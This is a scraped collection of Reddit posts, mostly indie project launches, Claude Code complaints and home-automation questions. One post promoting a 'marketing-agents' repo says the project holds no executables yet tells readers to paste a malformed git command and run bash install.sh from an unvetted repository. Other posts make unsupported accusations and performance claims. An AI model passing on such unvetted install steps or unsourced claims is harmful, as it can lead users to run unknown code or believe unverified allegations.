The business impact surprised me more than the technical achievement. My client workflows now maintain 99.2% uptime versus the previous 87% when I was manually babysitting everything. More importantly, I went from spending 2-3 hours daily on workflow maintenance to maybe 20 minutes weekly reviewing the auto-healing logs.

Has anyone else experimented with autonomous error handling in their workflows? I'm curious how others are approaching the balance between automated fixes and human oversight, especially for mission-critical integrations.

r/ClaudeAI Humble_Ear_2012

I accidentally built a 30-agent marketing system because I couldn't be bothered doing SEO manually

So I run a small web design studio for tradespeople — plumbers, electricians, builders. The kind of people who'd rather be fixing a boiler than thinking about their website. The problem was I had a product but absolutely no idea how to get it in front of people. I'm not a marketer. I'm a developer who keeps accidentally building tools instead of doing the actual work. Anyway, I started building agents in Claude Code to handle my marketing. One for SEO keyword research. Then one for content strategy. Then one for writing the content. Then I thought "well, I should probably do Meta Ads too" so I built 8 more. Then social media. Then I built agents that improve the other agents (at this point I'm aware I have a problem). I now have 30 agents across 3 channels: 1) Meta Ads (8 agents): from competitor research all the way to campaign deployment 2) SEO (8 agents): query classification → content → outreach → learning 3)Social Media (8 agents): audience research → content → publishing → engagement 4) Infrastructure (6 agents): these ones scan for new tools and upgrade the others weekly. Yes, I built agents that improve agents. No, I don't know when to stop. The bit I'm actually proud of: they all share a brain. It's a Supabase table called `marketing_knowledge`. When the Meta Ads agent discovers that pain-point hooks convert better than questions — the SEO content writer and social media agents pick that up automatically. Each cycle the whole thing gets a bit smarter. It's all just markdown files. No executables, no binaries, nothing dodgy. You can read every line before installing. ``` git remote set-url origin https://github.com/hothands123/marketing-agents.git cd marketing-agents && bash install.sh ``` Then `/marketing-setup` to configure it for your business. I built it for myself but figured others might find it useful. Genuinely keen to hear what's missing — I've been staring at this for weeks and have lost all objectivity. 
r/SideProject jojoavav

I built a completely free, no sign in required AI kanban board

Hey guys!

I've always loved tools like Draw and Sketch IO, and even Photopea that are completely free tools online that you can use without even signing in. So I built an AI powered project management tool.

I'm designing it to be the Cursor for kanbans.

Check it out and let me know what you think, no strings attached! kanbanai . dev

r/ClaudeAI KnightDotTech

Project I built with CC: Automatic Jira / Slack / Linear ticket completion with Claude Code

Been using Claude Code since its release and wanted to see if I could wire it up to actually work tickets from Jira / Linear / Slack without opening an IDE. Turns out it works pretty seamlessly.

Assign a Jira or Linear issue to Knight (or request work from a Slack DM) - it clones the repo, spins up a Claude Code session in an isolated container, writes the code, opens a PR, and if CI fails it reads the error and fixes it automatically.

The whole thing runs on ephemeral fly machines - one container per task, destroyed immediately after.

I am experimenting with offering the hosting as a service; currently the base subscription (1 agent) is completely free for life https://knight.tech (And there are also free trials available for the higher tiers, thus the project is free to try).

Would love it if some people here could test and be brutally honest on the functionality, website, etc.

r/mildlyinteresting Trainfan_4862

This paper clip from my podiatrist is shaped like a foot.

r/AI_Agents help-me-grow

Weekly Hiring Thread

If you're hiring use this thread.

Include:

  1. Company Name
  2. Role Name
  3. Full Time/Part Time/Contract
  4. Role Description
  5. Salary Range
  6. Remote or Not
  7. Visa Sponsorship or Not
r/mildlyinteresting k1tsk4

this starburst wrapper looks like it says "anus" in the GTA font

r/mildlyinteresting paribanu

In August 1972, this older couple took pictures of their cat on the beach.

r/SideProject LowkeyLegen

I built a SaaS to help small creators go viral consistently — would love your honest feedback

Hey everyone

I’ve been quietly building something called Virlo, and I wanted to share it here to get real feedback from people who understand SaaS.

Virlo is designed for creators, indie hackers, and small brands who don’t have a team but still want to grow fast on platforms like TikTok, X, Instagram and Facebook.

The problem I kept seeing:

Most people don’t fail because they lack creativity — they fail because they don’t know what actually works right now.

So instead of another saas flop,” Virlo focuses on one thing:

• Helping you create content that performs before you even hit publish.

Here’s what it does:

- Surfaces emerging trends early (before they’re saturated)

- Breaks down why a piece of content is working

- Suggests content angles tailored to your niche

- Helps you turn one idea into multiple viral variations

- Built for speed — because trends don’t wait

Think of it like:

A mix between a trend radar + creative assistant + growth strategist… but simplified.

I’m currently pre-launch, validating:

- Is this a real pain for you?

- Would you actually pay for something like this?

- What would make this a “must-have” vs “nice-to-have”?

No fluff — I genuinely want to build something useful.

If you’re a creator or building in this space, I’d really appreciate:

•Your honest thoughts

• What you think is missing

• Or even just a “this won’t work” (seriously)

Thanks

r/SideProject InternetWrong9088

Is it just me, or have the big tech subreddits become completely toxic toward AI lately?

I’ve been scrolling through r/technology and r/Futurology this morning and it’s honestly exhausting. It feels like any post about an actual technical breakthrough—whether it’s a new solver, a hardware jump, or a model update—immediately gets buried under "AI slop" comments and doom-posting.

I get the frustration with low-effort content, I really do. But the lack of actual technical nuance is wild. It’s like we’ve moved from "the future is exciting" to a total "witch hunt" mentality where you can't even discuss the tech without being called a bot or a shill.

Has anyone else felt forced to move to smaller, niche subs just to have a normal, grounded conversation about where this is all going?

r/SideProject Low-Flamingo6601

I built a simple app using AI that auto-deletes temporary contacts

Hey everyone,

I kept finding random numbers like "Delivery Guy" or "Sofa Seller" sitting in my contacts months after I actually needed them. It was a minor annoyance, but I wanted a way to keep my phonebook clean without having to manually delete things.

So, I built a simple app to fix it and wanted to share it here in case anyone else finds it useful. It's called TempContact.

How it works:

  • You add a contact through the app.
  • Set an expiration timer for that specific number.
  • When the time is up, it automatically removes them from your phone.

Full transparency: I actually built this entire thing using AI! It was a fun project to bring the idea to life.

You can check it out here: 👉TempContact on Google Play

If you end up trying it out and it helps keep your phone clean, a quick Play Store review would be awesome and really helps me out. Otherwise, I'm just hanging out in the comments—let me know what you think or if you have any feedback!

r/comfyui www_emma

consistent characters

what is the best workflow for this? or is it best to make a lora?

r/Anthropic eat-a-potato

Are the Pro limits really this bad? Mostly personal use.

I logged on at 8 a.m. had three conversations with Claude on the pro plan, and it said I used my limits. I was ONLY using it to refine some emails at work. I did use it yesterday to set up some scheduling brainstorms, but this is crazy. I don't want to use ChatGPT for ethical reasons — I also feel like Claude is better for personal use (I prefer it for trip-planning, meal-planning, workout schedules) but for the same price I could talk with Chat all day.

Is this your experience? I'm not looking to rant but looking for real insight. My work is editorial, so there is no coding expectations, just proofreading and tweaking of copy. But, honestly, I barely use it for work. I mainly use it as my personal assistant. Is this typical? How much do you seem to get out of the pro plan?

r/SideProject More_Oil_5225

[Project Update] Building "Pure Weather" with Flutter – A Minimalist iOS-inspired Instrument 🌤️

Hi everyone!

I wanted to share an update on a personal project I’ve been working on: Pure Weather.

The goal isn't just to build another weather clone, but a 'Pure Instrument' inspired by the iOS design system. I’m focusing on high-utility data and a minimalist aesthetic that tells you exactly what you need to know before stepping out the door.

Current Features & Logic:

Context-Aware Advice: The app doesn't just show numbers; it interprets them. Based on temperature, rain probability, and wind speed (crucial for where I live!), it provides a 'What to Wear' module.

Dynamic Iconography: A custom mapping of WMO Weather Codes that distinguishes between Day and Night (Sun vs. Moon) to reflect the real sky.

Yesterday vs. Today: A comparison module to quickly understand if it’s going to be colder or warmer than the previous day.

Commuter Timeline: A horizontal scroll view for hourly forecasts with dynamic icons.

Tech Stack:

Framework: Flutter (managed via FVM for version stability).

State Management: BLoC / Cubit.

Networking: Dio (fetching from Open-Meteo API).

Design: Google Fonts (Inter) with deep dark-mode gradients.

What’s Next? 🚀

Now that the core engine is stable, I’m moving into the next phase: Outdoor Hobby Modules.

I’m starting to program specific logic for outdoor enthusiasts. Think of it as 'pro-layers' you can toggle:

Fishing/Marine Module: Focusing on pressure changes and water conditions.

Hiking/Surf Module: Wind gusts, UV intensity, and visibility.

I’d love to get your feedback on the UI/UX and the idea of 'Outdoor Modules.' What specific data points would you find indispensable for your hobbies?

P.S. Screenshots attached! Let me know what you think about the card-based layout!

r/homeassistant Mevoune

NAS synology X HA

J’ai installé sur mon NAS synology un container HA.

Je souhaite pouvoir connecter des appareils en zigbee sauf que je n’arrive pas à avoir accès aux modules complémentaires de HA. Comment faut-il faire pour y avoir accès ?

Merci 😁

r/ClaudeAI trashtiernoreally

/login in WSL Broken?

Fired up Code in WSL today as is my wont. After my prompt I'm given a 401 please /login. OK, I do that. Have done that a dozen times so it's old hat. Copy link, paste back code. I get either a 500 response or supposedly exceeding the timeout of 15 seconds even when I clearly don't. Doesn't help the auth endpoints themselves are slow today (slow to get the URL, slow to get the token back, slow to get the 500). Version is 2.1.92, Ubuntu 24.04.

r/SideProject Glittering-Isopod-42

Built a Chrome extension that prevents leaking API keys into AI chats

It’s surprisingly easy to leak API keys while pasting logs into AI tools.

Built a simple fix.

A Chrome extension that:

  • Masks secrets before they reach AI
  • Restores them when you paste back

No friction, fully local, open source.

Would love your thoughts: https://secretsanitizer.com;
See the demo 👇

Stop leaking secrets to AI

r/LocalLLaMA kushvinth

Best way to run LLaMA locally on 8GB VRAM for multi-agent simulations?

Hi everyone,

I’m currently working on a project called ZELL, essentially a local-first simulation environment where I spin up synthetic societies of AI agents (each with their own persona, memory, and decision logic) and run multi-cycle interactions between them.

The idea is to explore complex, high-stakes “what-if” scenarios, geopolitical, technological, etc., by letting these agents interact, form alliances, conflict, and evolve. Everything runs locally (Ollama / LocalAI), so I can use unfiltered models and observe raw behavior without guardrails.

From a systems perspective, this involves:

  • Multiple concurrent agents
  • Persistent memory + logs
  • Repeated inference cycles (so efficiency matters a lot)
r/ClaudeCode alessai

4.6 Regression is real!

As a +12-month heavy user of Claude Code MAX x20...

Opus 4.6 has become genuinely unusable, across a range different of use cases.

r/ClaudeCode texo_optimo

Getting "OAuth error: timeout of 15000ms exceeded" continuously one one machine but not any others.

Subject pretty much says it all. CC working just fine on my notebook but Won't oauth on my dev server. uninstall/reinstall. About to TS more but just wondering if anyone seeing this recently.

r/meme Miia_Queen

Me crying my eyes out over HACHIKO_ My dog in the backyard listening to me cry over another dog

r/ChatGPT SoftSuccessful1414

Here's how I talk to my ChatGPT from a Windows 98 desktop

I’ve been messing around with how interface design changes the way we experience AI. Most chat apps feel the same, fast, clean, kind of invisible.

Lately it also feels like AI itself is still in its dial up phase. Slow responses, thinking pauses, loading states. That’s what gave me the idea to lean into it instead of hiding it.

So I tried the opposite of modern design.

I put an AI inside a Windows 98 style desktop. Beige box energy. CRT glow. Dial up pacing. No cloud feeling, no modern UI patterns. Just folders, files, and a Start menu.

And weirdly, it feels more natural there than on a sleek glass UI.

Instead of chatting, you interact with it like an old computer:

  • Conversations live as files in My Documents
  • Deleted chats go to a Recycle Bin you can reopen
  • There’s a fake browser that has dial up sounds
  • The assistant works offline and local

The constraints change the experience more than I expected. Slowing things down and adding friction makes it feel more personal, almost like the machine itself is part of the conversation.

I also added things like fake boot screens, system errors, and small delays so it feels like the computer is actually thinking.

It started as a nostalgia experiment but turned into a design question for me:

What happens when you give AI an interface that has weight and limitations.

Curious what you all think from a UX / interaction design perspective.

Download: https://apps.apple.com/us/app/ai-desktop-98/id6761027867

r/SideProject Parking-Guava-3398

I built an open source AI worker desktop because one-off agents kept handing the work back to me

I kept running into the same problem with AI agents: they could finish a task, but they never really held the job.
The work would come back the next day and I was still the one rebuilding context, checking what was pending, figuring out what output mattered, and deciding what the next step should be.
So I built Holaboss. It’s an open source desktop + runtime for AI workers.
The core idea is that the worker should not just help with work. It should take the work off your hands.
When the work is recurring, stateful, and tied to an outcome, I don’t think a chat thread is enough.
The worker needs its own workspace. In Holaboss, each worker gets a real operating environment with:

  • AGENTS.md for human rules
  • workspace.yaml for the runtime plan
  • local skills
  • apps and integrations
  • outputs
  • durable memory
  • runtime state
  • automations
  • a handoff trail you can inspect later

The reason I built it this way is pretty simple. I care much less about “can the agent do one cool run?” and much more about “can this worker actually keep the work moving without me?”
That means stuff like:

  • recurring follow-ups
  • content/research loops
  • queue-based work
  • things with backlog, state, and unfinished next steps
  • work that should be judged by whether it keeps progressing, not whether one answer looked good

The part I’m most proud of is the structure. I didn’t want memory to just mean “more chat history.” I wanted the worker to have a real work boundary, so rules, memory, outputs, skills, and runtime truth don’t all get mixed together.
That makes it much easier to resume, inspect, hand off, and reuse. Tech wise it’s an Electron desktop with a TypeScript runtime, Fastify API server, and SQLite-backed state store. MIT licensed. macOS works today, Windows/Linux are still in progress.
Repo: https://github.com/holaboss-ai/holaboss-ai
If you like the direction, I’d really appreciate a ⭐️.
Happy to answer questions about the architecture or how I’m thinking about AI workers that own ongoing work instead of just doing one-off execution.

r/ClaudeCode Ok-Landscape3906

Trial pass

Does anyone have a trial pass available I would like to test it out before Actually spending the money to see if it fits with my project or not! Thanks in advanced in any kindness passed on to me i will be passing on to someone else! Have a great day!

r/LocalLLaMA Sicarius_The_First

4Chan data can almost certainly improve model capabilities.

The previous post was probably automoded or something, so I'll give you the TL;DR and point you to search for the model card yourself. Tbh, it's sad that bot posts / posts made by an AI gets prompted, while human made one gets banned.

I trained 8B on 4chan data, and it outperform the base model, did the same for 70B and it also outperformed the base model. This is quite rare.

You could read about it in the linked threads. (and there's links to the reddit posts in the model cards).

https://preview.redd.it/6u0vsqmccltg1.png?width=3790&format=png&auto=webp&s=324f71031e00d99af4e9d3884ee9b8a8855a44af

r/homeassistant jewellboy

Ikea Toffsmygga and Grillplats

Picked these two up this weekend in Virginia and both added to HA easily and are working great so far. I still can't figure out how this stuff is this cheap....

r/StableDiffusion Fdx_dy

Would Such a Grabber Tool Be Interesting to Anyone Here?

Found out that many grabbers are banned because of the captchas (gelbooru, r34us) so I decided to make a web extension where the captcha is bypassed by you, the human. Is it of any interest? Has someone done something similar?

I, personally, started using it in test regime for making a dataset and am pleasantly surprised by the speed gains it offers to me.

r/ClaudeAI HighDefinist

Login Trouble Again

I suddenly got the 401 authentication error once again, and after some attempts, I logged out, and then tried to log back in again, but got basically a wild mix of all kinds of error messages, including "Invalid link", "Auth Timeout (15000ms)", "Link already used" (at least that made sense because I accessed the same link in two different sessions), and a few others as well...

Now, there are a few things slightly unusual about my system, for example the EMail I am using with Claude is not my primary GMail account, and I am also sometimes using a VPN, but this shouldn't really trip up any of their systems...

Also, I am using a Max X5 subscription.

So, is Claude down again (for some people), or is this problem only applying to me?

r/homeassistant DivergingDog

Early Beta Testers Needed - Use your Roborock completely offline with no custom firmware!

Hi everyone!

Lash-L here (one of the main maintainers of the Roborock integration). For a long time one of the biggest asks from users was that they wanted to be able to use their vacuums completely offline. In the Roborock integration, we connect to the vacuum using local protocol, but there are two limitations that block you from being able to block the network from hitting the internet.

  1. Roborock forces all map related messaged to go to the cloud. This is the only cloud-required feature.
  2. If the roborock vacuum cannot access Roborock's cloud, it will not allow ANY messaging. The vacuum will constantly restart its internet trying to reconnect to Roborock's cloud.

Cloud problems have been the number source of issues for Robroock in HA. They change their login flow, they more aggressively kick clients off of mqtt topics, etc. Every time that happens, things break, I have no warning and I play catch up and some users end up getting stuck with a temporarily broken product.

It's taken a long time and a lot of reverse engineering, but I made a solution that I am pretty happy with and that has been working well for me in my home.

https://github.com/Python-roborock/local_roborock_server

I am releasing this in EARLY beta. If you are technical in nature and are okay with using something that may not work 100%, I would love if you would give this a try. If you aren't super technical, I'd recommend starring the repository and coming back to it later as I will do an 'official' v1 release that should have some quirks ironed out. You can undo it in 2 minutes just by doing the wifi onboarding via the official Roborock app.

The current limitations:
- You must own a domain name

- I highly recommend you do not make the server accessible outside of your network as there is limited authentication on it

- Roborock Q7/Q5 series is not supported and may never be supported. (This adds some quirks if you own one of these devices and a supported device)

Here's a rough walkthrough of the setup:

  1. You clone the repository locally
  2. You run a configure script to build your config
  3. You launch the docker server and clone your cloud data (i.e. your devices, your routines, rooms, etc.)
  4. You go through an onboarding process on your vacuum 2-3 times
  5. You manually update your HA config entry file and run a script to get access on your phone if you would like that.

The full walkthrough is here: https://python-roborock.github.io/local_roborock_server/installation/

The Ideal beta testers:
- Understand there might be bugs

- Willing to send PRs around things like documentation (This is huge! I need help from people making instructions more exact!)

- Understands things like DNS, docker, etc.

- Has about ~ 1 hour to get things setup.

- Is able to diagnose some issues themselves

This is an EARLY beta. In the future I hope to have it working as a home assistant addon that should be much easier to install, but until then I need people to test it so we can see what is working, if there is any functionality I still need to recreate, and what the pressure points are.

If you're interested in learning more about how it works, you can also check out my linkedin post or the technical writeup

r/homeassistant chemikalguy

Home Assistant Hardware Guidance Needed

I'm new to Home Assistant and wanted to get some guidance on it. I installed HA as a virtual machine in Proxmox to play around with, and really like it. I need some guidance on hardware choices for adding smart devices. I'm trying to get away from all the data brokers like Amazon, Google, etc., and hence I want to have everything in-house.

I'm looking for the hardware piece that acts as a hub, gateway, or whatever it's called that allows smart devices to connect to HA. I see that Home Assistant Green can do all that, but I would prefer to just keep HA on my own hardware. Is there an affordable device that can act as a connection for Matter, Z-wave, and Zigbee devices all in one like the HA Green can? I can do USB passthrough to my VM for this if there's a USB dongle that does it.

As I said, I'm new to this and might not know exactly how to phrase what I'm looking for if I didn't explain it well enough.

r/StableDiffusion vault_nsfw

Question regarding comfyui save step not being run the first time

I have a Z-Image Workflow with 4 steps, I save the image at 3 step, after initial gen, after 2nd pass and the final result. But the very first time I generate something after starting Comfyui it only saves images after fully completing the workflow, not at each step. Why? and how can I get it to save initial gen even on the first time? It's annoying having the let it run through every single first time before it starts saving the initial image.

r/Anthropic ChiGamerr

RIP Clawbot? How Can We Save $ With The New Rules?

Title kinda says it all. Just trying to figure out how to adjust workflow or make clawbot more affordable since it's not using extra usage?

Only recently started using Clawbot (never used it as part of my sub) but really a fan. So want to keep using it. Any and all advice is appreciated.

Thanks!

r/LocalLLaMA CosmicRiver827

Qwen3.5-Plus or Qwen3.5-Omni-Plus for Creative Writing and Companionship?

Hi, I use LLMs primarily for creative writing help and daily life emotional support. I’m still trying to determine which one would be considered warmer more creative.

Omni could be it, but it has a context window of 256k, and I admit I don’t understand how big that actually is, especially for brainstorming and help with writing a book.

Plus could be it, but I’m not sure how warm it is in comparison, but it has a 1M context window which is hard to ignore.

Also, I’m not seeing a place where I can opt out of my data being used for training and want to make sure my story is protected. Is it already? Or do I need to do something?

Hopefully I can find a place to download the LLM so I don’t have to worry about it getting yanked like 4o and 5.1 Thinking of ChatGPT.

Anyway, I would appreciate your help.

r/SideProject BugAccomplished1570

I built reddit-skills: AI agents can now browse, post, and interact on Reddit using your real browser

Open-source Python toolkit that lets AI agents (Claude Code, Cursor, etc.) browse feeds, search posts, comment, vote, and publish on Reddit -- all through your actual browser session via a Chrome extension bridge. No API keys needed. 5 skill domains, full CLI with JSON output. MIT licensed. https://github.com/1146345502/reddit-skills

r/automation Abhi_10467

What are the daily tasks that can be automated

I am just trying to work on an automation app just like a habit tracking app.

But in this app you can track all the works you have automated.

I am just curious how I should start working on this idea.

This will a tracking website to track all the automated works.

Is this a good app idea or not?

r/LocalLLaMA choeng_919

I mapped the entire LLM knowledge engineering ecosystem — here's what nobody tells you

I spent a week analyzing 50+ awesome lists, surveys, and academic papers on RAG, context engineering, harness engineering, MCP, agent memory, and skill systems. None of them connected the dots.

So I wrote a unified guide: 11 chapters, 21K words, covering the full stack from knowledge retrieval to agent runtime.

Key findings:

- RAG is NOT dead. 71% of enterprises that tried context-stuffing came back to RAG within 12 months (Gartner Q4 2025)

- Same model + different harness = 6x performance gap (Meta-Harness paper, March 2026)

- Skills with compressed descriptions actually perform 2.8% better than verbose ones (SkillReducer, 55K skills studied)

- Progressive disclosure reduces token overhead by 85-95%

- China's Dify has 136K GitHub stars — more than LangChain

The guide also covers the Chinese AI ecosystem (Dify, RAGFlow, DeepSeek, Kimi) which most English resources completely ignore.

Includes a glossary for non-technical readers and a real-world case study of someone who built a complete knowledge harness with 65% token reduction.

Free, open source, MIT license.

github.com/kennethlaw325/awesome-llm-knowledge-systems

r/LocalLLaMA Far-Low-4705

For those running dual AMD MI50's, Qwen 3.5 35b at Q8_0 runs just as fast as running Q4_K_XL

just as the title says, at Q8_0, i am getting 55 T/s TG, with 1100 T/s PP, and Q4_K_XL, i get 60 T/s TG and about 600 T/s PP (lower cuz its running on a single gpu instead of two)

but thought this was kinda crazy, hopefully others find this useful

I suspect this is just due to software inefficiencies for older hardware.

r/StableDiffusion Low-Effective3972

Any thoughts about Pinokio?

I downloaded pinokio to help me experiment some stuff with ai models/applications

and i felt from what i've read it could be nice to use

i am now downloading forge for image generation, cause creating images online is a waste of time... ( especially when needing a prototype for a niche product )

i'm a little lost, especially that the internet connection is weak... and pinokio kinda hard to maintain breaking and needing fresh starts... so it is kinda painful...

any ideas? or stuff worth working on the side and experimenting with?

i am a software engineering student, with experience in backend development and devops concepts

someone told me to check pinokio to utilize ai apps on my local machine... but would love to hear someone's thoughts

any recommendations?

r/SideProject Away-Persimmon4958

Managing shared expenses across multiple families is way harder than I expected

We’re a group of friends living in a big city in Europe, most of us with families and kids.

Over time, we built this nice rhythm of meeting a couple of weekends every month, doing community gatherings, kids’ birthday parties, summer BBQs in the park, and one big yearly ski trip.

It’s honestly something we all look forward to.

But there was always one annoying part: managing shared expenses.

At first we used Splitwise, and it worked fine for a while.

But as our group grew (usually 6–8 families), and especially during trips like our ski week, things got messy.

To give a sense of scale: for the ski trip alone, we were tracking somewhere around €10 - 11K in shared expenses across the group.

That meant:

- Lots of small and big expenses every day

- Different people paying for different things

- Constant need to log everything quickly or within short time after the trip ends

At some point, the limits started getting in the way (like restricting how many expenses you can add unless you upgrade).

That’s where it started becoming frustrating, not because the app is bad, but because our use case was just… a lot.

After one of our trips, where we again spent way too much time figuring things out, I decided to build something simple just for us.

Nothing fancy, just something that lets everyone add expenses easily and keeps things clear for bigger groups without getting in the way.

Over time I kept improving it based on how we actually used it.

We’ve been using it within our group since then, and it’s been surprisingly smooth.

Curious if others have run into similar issues with bigger groups

r/SideProject zzhekoooo

I almost fired a high-ticket client today because their onboarding was so messy. Anyone else?

I've been running my agency for a while now, and l've realized something painful: I love the actual work, but I absolutely HATE the first 48 hours after a client signs.

It's always the same chaotic cycle:

• Chasing them for brand assets (logos, fonts, hex codes) that should have been sent days ago.

• Waiting forever for a signed contract while the project timeline slips.

• Explaining the same "next steps" for the 100th time in a messy Slack thread.

• Important files getting lost in email attachments.

It makes me look disorganized, it kills my momentum, and honestly, it makes me dread signing new clients.

I finally got fed up and spent the last few weeks building a side project called Fentyr to automate this for my own sanity (branded portals, AI-generated contracts, auto-reminders). It’s been a total lifesaver for my workflow.

I'm curious-how are you guys handling this at scale? Are you using a specific stack (Notion/ Slack/Typeform), or are you just embracing the chaos like I was?

If you’re an agency owner or freelancer, I’d love to hear your onboarding nightmares. Also, if you want to check out what I built and give some feedback, I’m happy to share the link!

r/ClaudeAI semibaron

1m Context Window actually useful?

I'm around since Claude Sonnet 3.5 (v1) and back then once the context blew past 100k, the session performance was degrading fast.

Nowadays Opus 4.6 comes with a 1m context window by default. Is that even any useful? I've the feeling it stays quite accurate up to maybe 250k tokens, but then it also degrades quite fast.

Is there any point in having this large of a context window or is it just about pumping up the numbers to look impressive?

r/LocalLLaMA Historical_Quality60

ziggy-llm: High-performance GGUF inference engine in native Zig

I just open-sourced ziggy-llm, a Mac-first inference engine designed specifically for Apple Silicon and Metal performance. The goal is to make it the fastest inference engine for GGUF models on Apple hardware.

The project is written in Zig and current benchmarks show promising results, getting reasonably close to llama cpp, for a one week old project.

I am looking for contributors to help support more model families, test on different Apple hardware, give feedback and help implementing broader quantization/model coverage. If you are interested in Zig, Metal or low-level LLM performance, please check out the repo

GitHub: https://github.com/Alex188dot/ziggy-llm

r/ChatGPT addictions-in-red

Being real: Chatgpt has been helping me with a breakup and dating.

Disclaimer: I freaking hate Sam Altman and have many ethical concerns about AI usage and how it will affect society, but have been using the tools available to me (in work and personal life) so I'm as informed as I can be.

I know that chatgpt is "not a therapist" and has a lot of limitations. But it has actually been doing a kick-ass job of helping me with a breakup and try to change my patterns for my next relationship.

This might be unpopular but I wanted to share it, because I think it's really important.

I don't take chatgpt's advice 100% of the time, I filter it through my own judgment and worldview (as I would with any therapist). But, it does usually get the way I work and what types of things will work for me.

It has actually held me pretty accountable, as well, which I'm surprised by. I have people-pleasing/doormat tendencies, and when I run a situation by it, it will point out when I'm doing that and suggest other ways to respond, and has encouraged me to be more assertive (in appropriate ways).

Most importantly, through my breakup, when I had weak moments, it helped me understand what I was feeling (nervous system adjusting to an attachment loss, for instance) and put it into context. Several times it helped me through moments when I wanted to reach out to my ex.

Now that I'm looking at dating again, I have shown it a few tinder/eharmony profiles to get its take, and it had some pretty good insights/things to watch for.

If you're in a place where you're not sure what reality is, or so depressed you don't have good judgment for yourself anymore, I would not recommend chatgpt (unless you have no other option). But if you're just going through something, are pretty grounded, and need help processing it, it can be a great tool.

Sorry for the long post, but I think it's important to have a balanced take on this tech.

r/ClaudeCode Either-Inspection197

REEE LOGIN NO WORK

r/ClaudeCode Future_Addendum_8227

I'm beginning to think there IS a bubble coming

  1. incentive users to work off peak

  2. cut usage limits

  3. add "effort button" where max was the original effort and "medium" is now the default. dont tell anyone about this hoping a certain subset of users dont notice and tell the ones who do to go to "max"

  4. randomly switch to cheaper model mid conversation

  5. randomly switch to cheaper model mid conversation while telling the user they are still on the higher model (ACTUAL FRAUD). Give everyone a single month of free credits when you are called out while not actually walking back the compute degradation.

^^^ANTHROPIC IS HERE^^^

  1. discontinue successful products entirely to save compute

^^^OPEN AI IS HERE^^^

r/ChatGPT OtherConstruction742

Is it just me or is picking the little engagement hooks at the end of Chatgpt messages worse?

If you don't know what I'm talking about, you know those little "if you want...." or " pick

●"

parts at the end of messages? Those are engagement hooks. There designed to give something suitable and related to the chat so the user can say yes, leading to further engagement in the chat. Which means more cookies and data.

But I find saying "yes" to these engagement hooks leads to worse quality answers than your own prompts.

Generally, chats will give you decent quality answers to your prompts. But these answers will always include little engagement hooks at the end unless you specify. And when you say yes or pick one of the objects from the engagement hooks, the response delivered is worse quality than usual.

I can't be only one who fins this true, right?

r/ClaudeAI CupcakeMafia_69

Enable spelling auto correct?

I find the "built in dictionary" of claude to be really bad. it marks my words as misspelled (correctly), but no only does not auto correct them, but when I right click them, half of the time it doesn't know the word I was trying to spell. Recently examples are "peple", "organice", and "seperation". Is there a way to enable auto correct and improve or replace the dictionary?

I'm using the desktop app on macOS. The macOS auto correct function well everywhere else. Thanks!

r/homeassistant syspig

Trigger garage lights when door opens

My basic setup for this question: HA Green, UPB lights and Tailwind garage door controllers. Everything is installed, integrated and working, but in taking my first step into automations I've encountered a hurdle. The goal is to have the shop lights turn on when any of the garage doors open.

I have that working - sort of. While I should probably get familiar with yaml file editing, I created an automation through the HA interface that triggers off the Tailwind devices, turning on the lights when the open command is sent. That works perfectly when using HA to open the garage doors.

However, that's only one of several ways the doors will be opened. Wall mounted openers, vehicle remotes, vehicles via Android Auto/Tailwind, or just using the Tailwind app itself. None of these other methods trigger the lights coming on.

Call me silly, but I assumed HA monitors device state and should see when the doors open regardless of how that's initiated. Is there a way to pull this off when not using the HA interface?

r/meme bianca2aquino2

Everytime

r/SideProject Mission_Bet_4095

Launched Logma - voice-first calorie tracking iOS app

Hey r/SideProject! Just shipped Logma to the App Store.

What it does: Track calories by speaking instead of typing. No database searches.

Why I built it: Got tired of typing every meal into MyFitnessPal. Especially frustrated when apps don't recognize Middle Eastern food (manakish, kibbeh, shawarma).

Tech: iOS (SwiftUI), OpenAI API for parsing voice input, USDA database for nutrition

Link: https://apps.apple.com/us/app/logma/id6759130753

Pricing: Free with optional $3.99/mo Pro

Would love feedback from fellow builders - what would you want in a voice-first tracker?

r/n8n ProfessionalRun5460

Automating event form creation & evaluation with AI agents in n8n

Hey everyone,

Sharing a workflow showing how AI agents can manage event forms end-to-end:

  • Phase 1 — Setup: Slack triggers form creation → AI agent generates, reviews, updates & publishes → Google Calendar event shared.
  • Phase 2 — Monitor: Webhook fires on responses → AI agent evaluates → routes by quality (HIGH / MEDIUM / LOW) in Slack.

Agent tools used: generate/get/update/publish forms, parse responses, trigger Slack notifications.

GitHub (workflow included): https://github.com/Formfex/n8n-nodes-formfex

📌 Visual workflow attached for reference.

https://preview.redd.it/h1xwhym9zktg1.png?width=1750&format=png&auto=webp&s=d48eeb00d4b8ec4d51b1cf618cc5240ded5e522c

r/ClaudeAI Ok-Fish-5074

issue of disconnected understanding cuz of forgetting context when reading large information linearly

Guys,when you read a big book, you often forget the context of the previous things leading to a disconnected understanding , what stack including claude code, wud u suggest to form a web of atomic level of concepts that are connected to the immediate bigger concept and form a connected web. I'm a founder and a clg student, and I'm down to a discussion as well as a designing meeting or call if needed, to solve this problem

r/ClaudeAI ComplaintCapital1327

Managing secrets for multiple MCP servers in Claude Code — current DX is painful

We're building an AI product and use Claude Code (VS Code extension) as our primary development environment. This means connecting a lot of MCP servers — GitLab, Jira, internal APIs, staging environments — each requiring its own auth tokens.

Right now managing all these secrets in .mcp.json is a real pain:

  • Can't commit .mcp.json to git because it contains tokens
  • System env vars for 10+ tokens is a mess, especially on Windows (PowerShell SetEnvironmentVariable + full VS Code restart for each one)
  • Onboarding a new developer means a manual checklist of "set these 12 env vars"

Meanwhile, VS Code's native MCP config already solves this with ${input:id} — prompts once, stores in OS keychain via SecretStorage, done. Same pattern works in tasks.json and launch.json, developers already know it.

I've proposed adding this to Claude Code's .mcp.json: github.com/anthropics/claude-code/issues/44158

Small, backward-compatible change. Would appreciate a 👍 if you're hitting the same problem. Curious how others manage MCP secrets today.

r/ollama Konamicoder

Remotely accessing my Ollama local models from my phone

I just wanted to share that I have been enjoying the ability to remotely access and query my local models installed in Ollama on my M1 Max MacBook Pro from my iPhone 15 Pro Max.

On the phone: I’m using the free Reins app.

On my Mac: Ollama with Gemma4 and qwen3.5 models installed.

Remote access: I set up a secure Cloudflare tunnel on a custom domain name to Nginx Proxy Manager running on my Linux server Homelab, which then routes to the internal IP:port of the Mac running Ollama.

With this setup, I am able to chat on my phone with my ollama models, primarily Gemma4:26b, and use it for general things that I used to use the ChatGPT app for. Only with this method my LLM use is completely private and secure, and I’m not sending my info and chats to OpenAI’s cloud servers.

